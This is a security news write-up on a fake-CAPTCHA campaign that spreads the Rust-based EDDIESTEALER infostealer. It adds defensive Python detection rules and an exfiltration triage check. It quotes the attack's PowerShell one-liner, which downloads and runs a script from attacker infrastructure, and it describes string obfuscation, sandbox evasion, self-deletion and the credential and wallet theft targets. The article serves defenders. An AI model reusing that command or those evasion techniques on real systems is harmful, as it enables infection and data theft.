Sunday, January 18, 2026

Hackers Distribute Fake CAPTCHA Campaigns that Trick Users into Installing a Rust-Based InfoStealer

Cybersecurity researchers at Elastic Security Labs have uncovered a campaign that leverages fake CAPTCHA verification pages to distribute a Rust-based infostealer known as EDDIESTEALER.

This novel malware showcases the continued professionalization and technical evolution among cybercriminals, exploiting user trust in familiar verification systems to facilitate the stealthy installation and operation of an advanced data exfiltration tool.

Figure: EDDIESTEALER’s execution chain

The Attack Chain: Social Engineering Meets Technical Sophistication

The infection begins when unsuspecting users encounter a fake CAPTCHA, often embedded in compromised or malicious web pages.

Styled to closely mimic Google’s reCAPTCHA (e.g., “I’m not a robot”), the page employs a social engineering sequence:

  1. Obfuscated React-based JavaScript presents a counterfeit CAPTCHA.
  2. Upon interaction, the script silently copies a malicious PowerShell command to the user’s clipboard.
  3. Users are then instructed to run this command via Windows+R and paste, unknowingly triggering the download of a second-stage payload (gverify.js) from attacker infrastructure.

PowerShell one-liner (simplified):

```powershell
powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'hxxps://llll.fit/version/' -OutFile $env:USERPROFILE\Downloads\gverify.js; cscript //B $env:USERPROFILE\Downloads\gverify.js"
```

gverify.js itself is an obfuscated script that fetches and executes the main Rust-based infostealer, which is dropped to the Downloads folder under a pseudorandom filename.
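The chain above (Run dialog, hidden PowerShell download, cscript launching a .js from Downloads) is what endpoint telemetry can key on. The following is an added detection example, not code from the article or from Elastic; it runs a few rules over constructed Sysmon-style process-creation records (the user path and the benign third record are made up) and also covers the abbreviated `-ep`/`-w` switch forms, which goes slightly beyond the exact one-liner quoted above.

```python
import re
from dataclasses import dataclass

@dataclass
class ProcEvent:
    parent: str   # parent image name (explorer.exe for a Run-dialog launch)
    image: str    # child image name
    cmdline: str  # full command line as logged

# Constructed Sysmon-style process-creation records that mirror the chain in
# the article (Run dialog -> hidden PowerShell -> cscript on a .js in Downloads).
# The user path and the benign third PowerShell launch are made up for the test.
SAMPLE_EVENTS = [
    ProcEvent("explorer.exe", "powershell.exe",
              "powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden "
              "-Command \"Invoke-WebRequest -Uri 'hxxps://llll.fit/version/' "
              "-OutFile C:\\Users\\bob\\Downloads\\gverify.js; "
              "cscript //B C:\\Users\\bob\\Downloads\\gverify.js\""),
    ProcEvent("powershell.exe", "cscript.exe",
              "cscript //B C:\\Users\\bob\\Downloads\\gverify.js"),
    ProcEvent("explorer.exe", "powershell.exe",
              "powershell -NoProfile -File C:\\scripts\\backup.ps1"),
]

# (rule name, predicate). Abbreviated switches (-ep, -w) are covered as well.
RULES = [
    ("hidden_bypass_powershell", lambda e:
        e.image.lower() == "powershell.exe"
        and re.search(r"-(ExecutionPolicy|ep)\s+Bypass", e.cmdline, re.I) is not None
        and re.search(r"-(WindowStyle|w)\s+Hidden", e.cmdline, re.I) is not None),
    ("download_then_script_host", lambda e:
        re.search(r"Invoke-WebRequest|\biwr\b|\bcurl\b", e.cmdline, re.I) is not None
        and re.search(r"\b[cw]script(\.exe)?\s+//B\b", e.cmdline, re.I) is not None),
    ("script_host_on_downloads_js", lambda e:
        e.image.lower() in ("cscript.exe", "wscript.exe")
        and re.search(r"\\Downloads\\[^\s\"]+\.js\b", e.cmdline, re.I) is not None),
]

def evaluate(events):
    """Return [(event index, [matched rule names])] for events that hit any rule."""
    hits = []
    for i, ev in enumerate(events):
        names = [name for name, pred in RULES if pred(ev)]
        if names:
            hits.append((i, names))
    return hits

if __name__ == "__main__":
    for idx, names in evaluate(SAMPLE_EVENTS):
        print(idx, SAMPLE_EVENTS[idx].image, names)
```

Correlating the first two hits on parent/child relationship (powershell.exe spawning cscript.exe) is what raises this from two medium-confidence signals to one high-confidence alert.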

Rust as the Language of Choice

Rust’s increasing popularity among malware developers is evident with EDDIESTEALER.

Its memory safety, efficient abstractions, and difficult-to-analyze binaries (due to aggressive optimization and inlining) frustrate traditional detection and reverse engineering.

Most critical strings are encrypted via a simple XOR cipher, with decryption performed just-in-time within the relevant function. Each decryption routine uses distinct key derivation logic, complicating bulk static analysis.

Example string decryption pseudo-code:

```rust
// Pseudo-code: each call site derives its own XOR key and decrypts the
// embedded blob just before use, so no plaintext strings sit in the binary.
fn decrypt_string(encrypted_blob: &[u8], addr: u64, key: u32) -> String {
    let xor_key = derive_key(addr, key); // per-function key derivation logic
    let plain: Vec<u8> = encrypted_blob.iter().map(|b| b ^ xor_key).collect();
    String::from_utf8_lossy(&plain).into_owned()
}
```

APIs are dynamically resolved as needed. EDDIESTEALER decrypts target DLL and function names, checks an internal cache, and, if necessary, dynamically loads modules and retrieves function pointers, obfuscating the malware’s import table and frustrating static signature-based detection.

Mutex, Sandbox, and Self-Destruct Features

  • Mutex Creation: On execution, EDDIESTEALER creates a mutex using a decrypted UUID to ensure only one instance runs.
  • Weak Sandbox Evasion: It checks system RAM; systems with below ~4GB are assumed to be sandboxes or VMs, prompting self-deletion.
  • Self-Deletion: Employs NTFS Alternate Data Stream renaming, a file-lock bypass technique, to securely remove itself from disk post-execution.

Command & Control (C2) and Data Exfiltration

Upon startup, EDDIESTEALER contacts its C2, constructing a unique URL using decrypted configuration data. The C2 returns a task list (JSON, AES-encrypted), specifying which files and data types to target:

Targeted Data (Examples):

  • Crypto Wallets: Electrum, Exodus, Daedalus, Atomic, etc.
  • Browsers: Chrome, Edge, Brave, Firefox (history, passwords, cookies).
  • Password Managers: Bitwarden, 1Password, KeePass.
  • FTP Clients, Messaging Apps

Exfiltration is performed via plaintext HTTP POST requests (distinct per task), each containing AES-encrypted payloads.

Sample JSON config structure:

```json
{
  "session": "unique_session_id",
  "tasks": [
    {
      "id": "task_id",
      "pattern": {"path": "<target_path>", "filters": [ ... ]}
    }
  ],
  "network": {"encryption_key": "<AES_key>"},
  "self_delete": true
}
```

EDDIESTEALER uses techniques re-implemented from open-source projects such as ChromeKatz to extract browser credentials, including leveraging Chrome’s DevTools Protocol and memory scanning, and even spawning off-screen browsers to load credentials into memory for exfiltration.

Defensive Recommendations

  • User Awareness: Train users about fake CAPTCHAs, especially those that prompt “copy and run” commands.
  • Defense-in-Depth: Block PowerShell script execution where not needed; monitor process chains launching scripts from browsers.
  • Network: Watch for suspicious outbound HTTP (not HTTPS) traffic, especially POST requests containing encrypted blobs to unfamiliar endpoints.
  • Incident Response: Forensic recovery must include memory and process monitoring to catch malware employing self-deletion.
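The exfiltration pattern described earlier (plaintext HTTP POST bodies carrying AES-encrypted payloads to endpoints nobody recognises) can be triaged from proxy or packet-capture logs. This is an added example, not code from the article; it assumes an allowlist of hosts the environment legitimately POSTs to over plain HTTP, and uses a pseudo-random byte string as a stand-in for ciphertext, since AES output is indistinguishable from random bytes for entropy purposes.

```python
import math
import random
from urllib.parse import urlsplit

def shannon_entropy(data: bytes) -> float:
    """Bits per byte (0..8); AES ciphertext sits close to 8, JSON or text well below."""
    if not data:
        return 0.0
    n = len(data)
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)

# Assumed allowlist of hosts this environment legitimately POSTs to over plain HTTP.
KNOWN_HTTP_HOSTS = {"updates.corp.example"}

def flag_post(method: str, url: str, body: bytes,
              known_hosts=KNOWN_HTTP_HOSTS, min_len=256, min_entropy=7.0) -> list:
    """Reasons a request resembles the stealer's exfil pattern: plaintext HTTP POST
    of an encrypted (high-entropy) blob to an unfamiliar host. Empty list = clean."""
    if method.upper() != "POST":
        return []
    parts = urlsplit(url)
    if parts.scheme.lower() != "http":
        return []  # TLS traffic needs a decrypting sensor; out of scope here
    reasons = ["plaintext http"]
    if parts.hostname not in known_hosts:
        reasons.append("unknown host")
    if len(body) >= min_len and shannon_entropy(body) >= min_entropy:
        reasons.append("high-entropy body")
    return reasons

# Constructed requests: a seeded pseudo-random body stands in for an AES-encrypted
# task result; the second is an ordinary telemetry POST to the allowlisted host.
_rng = random.Random(20250603)
ENCRYPTED_LIKE_BODY = bytes(_rng.getrandbits(8) for _ in range(2048))
TELEMETRY_BODY = b'{"status":"ok","uptime":3600}' * 20

SAMPLE_REQUESTS = [
    ("POST", "http://c2.example.invalid/upload", ENCRYPTED_LIKE_BODY),  # placeholder host
    ("POST", "http://updates.corp.example/ping", TELEMETRY_BODY),
    ("POST", "https://api.corp.example/v1", ENCRYPTED_LIKE_BODY),
]

def triage(requests):
    """Apply flag_post to (method, url, body) tuples; one reason list per request."""
    return [flag_post(m, u, b) for m, u, b in requests]
```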

Indicators of Compromise

